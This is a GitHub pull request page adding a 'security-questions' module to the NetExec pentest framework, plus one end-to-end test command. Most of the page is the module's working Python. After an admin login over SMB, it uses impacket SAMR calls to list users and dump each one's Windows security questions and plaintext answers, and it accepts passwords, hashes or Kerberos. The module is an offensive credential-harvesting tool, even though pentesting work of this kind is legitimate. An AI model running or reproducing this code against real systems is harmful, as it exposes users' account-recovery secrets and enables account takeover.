Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

add new security-questions module #295

Merged
merged 16 commits into from
Jul 23, 2024
Merged

add new security-questions module #295

Show file tree
Hide file tree
Changes from 9 commits
Commits
Show all changes
16 commits
Select commit Hold shift + click to select a range
39006b1
add new security-questions module
Adamkadaban May 8, 2024
dcee201
make this a high privilege module
Adamkadaban May 8, 2024
cc251e8
get rid of stray comment
Adamkadaban May 9, 2024
a579d22
more verbose answer for when user has no questions
Adamkadaban May 10, 2024
6838793
ruff checks for security-questions module. all passing now
Adamkadaban May 10, 2024
4919fe0
add comments to security-questions module
Adamkadaban May 12, 2024
3724142
add security-questions module to e2e test
Adamkadaban May 12, 2024
da61939
only import loads function from json.
Adamkadaban May 16, 2024
39b877a
use context.log.fail instead of print and add debugging
Adamkadaban Jun 1, 2024
21b1cfb
Merge branch 'Pennyw0rth:main' into dumpSecurityQuestionsModule
Adamkadaban Jul 1, 2024
45e1f08
make variable names pythonic
Adamkadaban Jul 1, 2024
0d5ac4e
fix find/replace nonsense
Adamkadaban Jul 1, 2024
2575bce
Swap bbreak with continue as we would only query the first user if he…
NeffIsBack Jul 18, 2024
5ae4134
Merge branch 'main' into dumpSecurityQuestionsModule
NeffIsBack Jul 18, 2024
766ef1e
Update impacket
NeffIsBack Jul 18, 2024
280baad
Add try&except block for every user so we continue if the first fails
NeffIsBack Jul 18, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
127 changes: 127 additions & 0 deletions nxc/modules/security-questions.py
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,127 @@
from impacket.dcerpc.v5 import samr, transport
from impacket.nt_errors import STATUS_MORE_ENTRIES
from impacket.dcerpc.v5.rpcrt import DCERPCException
from json import loads
from traceback import format_exc as traceback_format_exc


class NXCModule:
"""
Module by Adamkadaban: @Adamkadaban
Based on research from @0gtweet (@gtworek)

Much of this code was copied from add_computer.py
Reference: https://hackback.zip/2024/05/08/Remotely-Dumping-Windows-Security-Questions-With-Impacket.html
"""

name = "security-questions"
description = "Gets security questions and answers for users on computer"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True

def options(self, context, module):
pass

def on_admin_login(self, context, connection):
self.__domain = connection.domain
self.__domainNetbios = connection.domain
self.__kdcHost = connection.hostname + "." + connection.domain
self.__target = self.__kdcHost
self.__username = connection.username
self.__password = connection.password
self.__targetIp = connection.host
self.__port = context.smb_server_port
self.__aesKey = context.aesKey
self.__hashes = context.hash
self.__doKerberos = connection.kerberos
self.__nthash = ""
self.__lmhash = ""

if context.hash and ":" in context.hash[0]:
hashList = context.hash[0].split(":")
self.__nthash = hashList[-1]
self.__lmhash = hashList[0]
elif context.hash and ":" not in context.hash[0]:
self.__nthash = context.hash[0]
self.__lmhash = "00000000000000000000000000000000"

self.getSAMRResetInfo(context)

def getSAMRResetInfo(self, context):
stringbinding = f"ncacn_np:{self.__targetIp}[\\pipe\\samr]"
Adamkadaban marked this conversation as resolved.
Show resolved Hide resolved
rpctransport = transport.DCERPCTransportFactory(stringbinding)
Adamkadaban marked this conversation as resolved.
Show resolved Hide resolved
rpctransport.set_dport(445)
rpctransport.setRemoteHost(self.__targetIp)

if hasattr(rpctransport, "set_credentials"):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)

try:
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)

# obtain server handle for samr connection
resp = samr.hSamrConnect(dce)
serverHandle = resp["ServerHandle"]
Adamkadaban marked this conversation as resolved.
Show resolved Hide resolved

resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
domains = resp["Buffer"]["Buffer"]

resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle, domains[0]["Name"])

# obtain domain handle for samr connection
resp = samr.hSamrOpenDomain(dce, serverHandle=serverHandle, domainId=resp["DomainId"])
domainHandle = resp["DomainHandle"]
Adamkadaban marked this conversation as resolved.
Show resolved Hide resolved

status = STATUS_MORE_ENTRIES
enumerationContext = 0
Adamkadaban marked this conversation as resolved.
Show resolved Hide resolved

# try to iterate through users in domain entries for connection
while status == STATUS_MORE_ENTRIES:
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, enumerationContext=enumerationContext)
except DCERPCException as e:
if str(e).find("STATUS_MORE_ENTRIES") < 0:
raise
resp = e.get_packet()

for user in resp["Buffer"]["Buffer"]:
# request SAMR ID 30
# https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/6b0dff90-5ac0-429a-93aa-150334adabf6
r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user["RelativeId"])
info = samr.hSamrQueryInformationUser2(dce, r["UserHandle"], samr.USER_INFORMATION_CLASS.UserResetInformation)

resetData = info["Buffer"]["Reset"]["ResetData"]
Adamkadaban marked this conversation as resolved.
Show resolved Hide resolved
if resetData == b"":
break
resetData = loads(resetData)
questions = resetData["questions"]

if len(questions) == 0:
context.log.highlight(f"User {user['Name']} has no security questions")
else:
for qna in questions:
question = qna["question"]
answer = qna["answer"]
context.log.highlight(f"{user['Name']} - {question}: {answer}")

samr.hSamrCloseHandle(dce, r["UserHandle"])
enumerationContext = resp["EnumerationContext"]
status = resp["ErrorCode"]

except Exception as e:
context.log.fail(f"Error: {e}")
context.log.debug(traceback_format_exc())


finally:
if domainHandle is not None:
samr.hSamrCloseHandle(dce, domainHandle)
if serverHandle is not None:
samr.hSamrCloseHandle(dce, serverHandle)
dce.disconnect()
1 change: 1 addition & 0 deletions tests/e2e_commands.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -81,6 +81,7 @@ netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M imperson
netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M iis
netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M install_elevated
netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M ioxidresolver
netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M security-questions
# currently hanging indefinitely - TODO: look into this
#netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M keepass_discover
#netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M keepass_trigger -o ACTION=ALL USER=LOGIN_USERNAME KEEPASS_CONFIG_PATH="C:\\Users\\LOGIN_USERNAME\\AppData\\Roaming\\KeePass\\KeePass.config.xml"
Expand Down